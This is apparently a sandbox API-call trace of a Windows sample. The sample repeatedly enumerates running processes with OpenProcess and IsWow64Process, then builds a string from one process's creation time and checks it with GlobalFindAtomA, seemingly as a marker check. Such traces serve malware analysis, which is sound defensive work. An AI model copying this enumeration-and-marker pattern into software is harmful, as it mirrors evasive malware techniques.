	[0105.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.838] CloseHandle (hObject=0x694) returned 1
	[0105.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.838] CloseHandle (hObject=0x694) returned 1
	[0105.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.838] CloseHandle (hObject=0x694) returned 1
	[0105.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.838] CloseHandle (hObject=0x694) returned 1
	[0105.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.839] CloseHandle (hObject=0x694) returned 1
	[0105.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.839] CloseHandle (hObject=0x694) returned 1
	[0105.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.839] CloseHandle (hObject=0x694) returned 1
	[0105.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.839] CloseHandle (hObject=0x694) returned 1
	[0105.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.840] CloseHandle (hObject=0x694) returned 1
	[0105.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.840] CloseHandle (hObject=0x694) returned 1
	[0105.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.840] CloseHandle (hObject=0x694) returned 1
	[0105.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.840] CloseHandle (hObject=0x694) returned 1
	[0105.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.840] CloseHandle (hObject=0x694) returned 1
	[0105.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.841] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.841] CloseHandle (hObject=0x694) returned 1
	[0105.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.841] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.841] CloseHandle (hObject=0x694) returned 1
	[0105.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.841] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.841] CloseHandle (hObject=0x694) returned 1
	[0105.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.841] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.841] CloseHandle (hObject=0x694) returned 1
	[0105.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.842] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.842] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.842] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.842] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.842] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.843] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.843] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.843] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.843] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.843] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.843] CloseHandle (hObject=0x694) returned 1
	[0105.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.843] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.843] CloseHandle (hObject=0x694) returned 1
	[0105.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.843] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.844] CloseHandle (hObject=0x694) returned 1
	[0105.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.844] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.844] CloseHandle (hObject=0x694) returned 1
	[0105.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.884] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.884] CloseHandle (hObject=0x694) returned 1
	[0105.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.885] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.885] CloseHandle (hObject=0x694) returned 1
	[0105.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.885] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.885] CloseHandle (hObject=0x694) returned 1
	[0105.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.885] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.885] CloseHandle (hObject=0x694) returned 1
	[0105.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.886] CloseHandle (hObject=0x694) returned 1
	[0105.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.886] CloseHandle (hObject=0x694) returned 1
	[0105.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.886] CloseHandle (hObject=0x694) returned 1
	[0105.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.886] CloseHandle (hObject=0x694) returned 1
	[0105.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.887] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.887] CloseHandle (hObject=0x694) returned 1
	[0105.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.887] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.887] CloseHandle (hObject=0x694) returned 1
	[0105.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.887] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.887] CloseHandle (hObject=0x694) returned 1
	[0105.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.887] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.887] CloseHandle (hObject=0x694) returned 1
	[0105.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.887] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.887] CloseHandle (hObject=0x694) returned 1
	[0105.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.887] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.888] CloseHandle (hObject=0x694) returned 1
	[0105.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.888] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.888] CloseHandle (hObject=0x694) returned 1
	[0105.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.888] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.888] CloseHandle (hObject=0x694) returned 1
	[0105.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.888] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.888] CloseHandle (hObject=0x694) returned 1
	[0105.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.888] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.888] CloseHandle (hObject=0x694) returned 1
	[0105.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.888] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.889] CloseHandle (hObject=0x694) returned 1
	[0105.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.889] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.889] CloseHandle (hObject=0x694) returned 1
	[0105.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.889] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.889] CloseHandle (hObject=0x694) returned 1
	[0105.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.889] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.889] CloseHandle (hObject=0x694) returned 1
	[0105.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.889] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.889] CloseHandle (hObject=0x694) returned 1
	[0105.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.890] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.890] CloseHandle (hObject=0x694) returned 1
	[0105.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.890] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.890] CloseHandle (hObject=0x694) returned 1
	[0105.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.890] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.890] CloseHandle (hObject=0x694) returned 1
	[0105.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.890] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.890] CloseHandle (hObject=0x694) returned 1
	[0105.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.890] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.890] CloseHandle (hObject=0x694) returned 1
	[0105.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.890] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.891] CloseHandle (hObject=0x694) returned 1
	[0105.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.891] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.891] CloseHandle (hObject=0x694) returned 1
	[0105.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.891] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.891] CloseHandle (hObject=0x694) returned 1
	[0105.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.891] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.891] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.892] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.892] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.892] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.892] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.892] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.893] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.893] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.893] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.893] CloseHandle (hObject=0x694) returned 1
	[0105.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.893] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.893] CloseHandle (hObject=0x694) returned 1
	[0105.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.893] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.893] CloseHandle (hObject=0x694) returned 1
	[0105.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.893] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.893] CloseHandle (hObject=0x694) returned 1
	[0105.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.935] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.935] CloseHandle (hObject=0x694) returned 1
	[0105.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.936] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.936] CloseHandle (hObject=0x694) returned 1
	[0105.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.936] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.936] CloseHandle (hObject=0x694) returned 1
	[0105.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.936] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.936] CloseHandle (hObject=0x694) returned 1
	[0105.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.936] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.937] CloseHandle (hObject=0x694) returned 1
	[0105.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.937] CloseHandle (hObject=0x694) returned 1
	[0105.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.937] CloseHandle (hObject=0x694) returned 1
	[0105.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.937] CloseHandle (hObject=0x694) returned 1
	[0105.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.937] CloseHandle (hObject=0x694) returned 1
	[0105.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.938] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.938] CloseHandle (hObject=0x694) returned 1
	[0105.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.938] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.938] CloseHandle (hObject=0x694) returned 1
	[0105.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.938] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.938] CloseHandle (hObject=0x694) returned 1
	[0105.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.938] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.938] CloseHandle (hObject=0x694) returned 1
	[0105.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.938] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.938] CloseHandle (hObject=0x694) returned 1
	[0105.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.939] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.939] CloseHandle (hObject=0x694) returned 1
	[0105.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.939] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.939] CloseHandle (hObject=0x694) returned 1
	[0105.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.939] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.939] CloseHandle (hObject=0x694) returned 1
	[0105.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.939] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.939] CloseHandle (hObject=0x694) returned 1
	[0105.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.939] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.939] CloseHandle (hObject=0x694) returned 1
	[0105.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.940] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.940] CloseHandle (hObject=0x694) returned 1
	[0105.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.940] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.940] CloseHandle (hObject=0x694) returned 1
	[0105.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
